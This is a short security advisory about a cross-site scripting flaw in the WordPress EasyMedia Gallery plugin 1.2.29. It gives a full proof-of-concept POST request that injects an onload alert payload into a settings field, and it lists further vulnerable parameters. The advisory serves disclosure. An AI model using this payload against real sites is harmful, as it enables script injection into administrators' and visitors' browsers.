WordPress EasyMedia Gallery 1.2.29 Cross Site Scripting

2014.02.26
Credit: HauntIT
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# ============================================================== # Title ...| EasyMedia Gallery XSS # Version .| easy-media-gallery.1.2.29 # Date ....| 23.02.2014 # Found ...| HauntIT Blog # Home ....| http://wordpress.org/plugins/ # ============================================================== # ============================================================== # Multiple XSS ---<request>--- POST /k/wordpress/wp-admin/edit.php?post_type=easymediagallery&page=emg_settings HTTP/1.1 Host: 10.149.14.62 (...) Content-Length: 1452 option_page=easy_options_group&action=update&_wpnonce=e4392a9119&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Deasymediagallery%26page%3Demg_settings&easymedia_columns=3&easymedia_alignstyle=Center&easymedia_img_size_limit='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&easymedia_vid_size%5Bwidth%5D=700&easymedia_vid_size%5Bheight%5D=400&easymedia_disen_autoplv=1&easymedia_disen_autopl=1&easymedia_disen_audio_loop=1&easymedia_audio_vol=100&easymedia_box_style=Light&easymedia_cur_style=Pointer&easymedia_mag_icon=Icon-0&easymedia_frm_size%5Bwidth%5D=160&easymedia_frm_size%5Bheight%5D=160&easymedia_frm_col=%23FFFFFF&easymedia_ttl_col=%23C7C7C7&easymedia_brdr_rds=3&easymedia_thumb_col=%23000000&easymedia_hover_opcty=40&easymedia_style_pattern=pattern-01.png&easymedia_disen_bor=1&easymedia_disen_hovstyle=1&save3=Save+Changes&easymedia_disen_plug=1&easymedia_disen_rclick=1&easymedia_disen_databk=1&easymedia_disen_admnotify=1&easymedia_disen_dasnews=1&easymedia_ajax_con_id=%23content&easymedia_plugin_core=core-1.4.5-min&easymedia_plugin_wpinfo=-+WP+Version+%3A+3.8.1%0D%0A-+EMG-Lite+Version+%3A+1.2.29%0D%0A-+Site+URL+%3A+http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%0D%0A-+WP+Multisite+%3A+NO%0D%0A-+PHP+Direct+Access+%3A+YES%0D%0A-+Memory+Limit+%3A+128+MB%0D%0A-+Active+Theme+%3A+Twenty+Fourteen%0D%0A-+Active+Plugins+%3A+%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Easy+Media+Gallery%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Zedity%0D%0A&action=save ---<request>--- Also vulnerable are: easymedia_vid_size%5Bwidth%5D, easymedia_vid_size%5Bheight%5D, easymedia_frm_size%5Bwidth%5D, easymedia_ttl_col, easymedia_thumb_col, easymedia_hover_opcty, easymedia_style_pattern, easymedia_ajax_con_id # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) # o/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top